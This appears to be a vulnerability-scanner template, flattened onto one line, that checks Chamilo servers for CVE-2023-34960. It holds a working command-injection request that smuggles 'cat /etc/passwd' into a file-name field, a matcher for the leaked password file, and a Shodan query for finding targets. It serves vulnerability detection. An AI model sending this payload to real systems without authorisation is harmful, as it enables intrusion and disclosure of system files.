id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: high reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py metadata: max-request: 1 verified: "true" shodan-query: http.component:"Chamilo" tags: cve,cve2023,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 file_datafile_name`{}`.pptx'|" |cat /etc/passwd||a #service_ppt2lp_size720x540 matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200